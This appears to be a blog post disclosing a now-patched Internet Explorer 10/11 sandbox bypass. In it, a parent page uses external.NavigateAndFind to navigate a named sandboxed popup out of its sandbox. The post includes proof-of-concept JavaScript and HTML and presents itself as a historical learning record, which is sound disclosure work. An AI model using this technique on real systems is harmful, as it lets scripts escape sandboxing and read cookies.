Sandbox Bypass via external.NavigateAndFind on a Sandboxed Window

The HTML5 sandbox attribute correctly blocks most attempts to change the URL of a sandboxed window from outside. One exception: external.NavigateAndFind, an older IE API, could change the URL of a named sandboxed window when called from a non-sandboxed Trident, completely removing the sandbox restrictions from the destination.

document.cookie = "COOKIE WAS SET BY THE TOP WINDOW";

function iFrameOnLoad() {
    if (!window.loadedOnce) {
        window.loadedOnce = true;
    } else {
        setTimeout("changeSandboxedURL()", 1000);
    }
}

function changeSandboxedURL() {
    var currentPath = location.href.substring(0, location.href.lastIndexOf('/') + 1);
    external.NavigateAndFind(currentPath + "outofsandbox.html", "", "SANDBOXED_WINDOW");
}

<iframe onload="iFrameOnLoad()" sandbox="allow-scripts allow-popups"
  src="sandboxed_iframe.html" width="710" height="90"></iframe>

The sandboxed iFrame opens a named window (SANDBOXED_WINDOW) which inherits the sandbox. The parent page then calls external.NavigateAndFind targeting that window by name, navigating it to outofsandbox.html — which can read cookies and run scripts freely. Technically a non-sandboxed window initiating the navigation is required, but the sandboxed window should not be changeable via any external method. Tested on IE10 / IE11 build 20130312-2100.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [UXSS via iFrame getSelection After Redirect] :: [UXSS via Cached createRangeCollection After Redirect] >